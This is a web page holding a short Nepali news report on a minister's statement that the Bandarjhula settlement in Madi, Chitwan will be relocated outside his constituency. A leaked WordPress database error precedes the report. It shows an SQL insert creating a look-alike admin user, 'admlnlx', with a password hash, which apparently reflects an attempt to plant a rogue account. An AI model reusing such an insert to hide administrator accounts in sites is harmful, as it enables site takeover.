WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCLaPiRO7WZqdkF4oopCKTDgXL7wLO/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 09:20:57', '', 'admlnlx', 'admlnlx')
चितवन, माघ १५–
भुमी सुधार तथा व्यवस्था मन्त्री विक्रम पाण्डेले चितवनको माडीमा रहेको बाँदरझुला बस्तीलाई स्थानान्तरण गर्ने प्रक्रिया अन्तिम चरणमा पुगेको बताउनुभएको छ ।
आज भरतपुर विमानस्थलमा संचारकर्मीहरुसंग कुरा गर्दै मन्त्री पाण्डेले बाँदरझुला बस्तीलाई स्थानान्तरण गर्ने निर्णय मन्त्रीपरिषद्बाट पारित भईसकेको जानकारी दिँदै अब छिट्टै बस्ती स्थानान्तरण गराईने जानकारी दिनुभयो । उहाँले बाँदरझुला बस्तीलाई चितवन क्षेत्र नम्बर ५ बाहेकका क्षेत्रमा स्थानान्तरण गर्ने निर्णय भएको जानकारी दिनुभयो । “पाँच नम्बर भित्र स्थानान्तरण गर्दा निर्वाचन लक्षित भनेर आरोप लाग्न सक्छ, त्यसैले मेरो निर्वाचन क्षेत्र बाहिर नै स्थानान्तरण गर्दैछौं्”–मन्त्री पाण्डेले भन्नुभयो ।
मन्त्री पाण्डेले केहीदिन भित्रमै चितवनमा मालपोत र नापी कार्यालयको सेवा कार्यलय विस्तार गरिने जानकारी दिनुभयो ।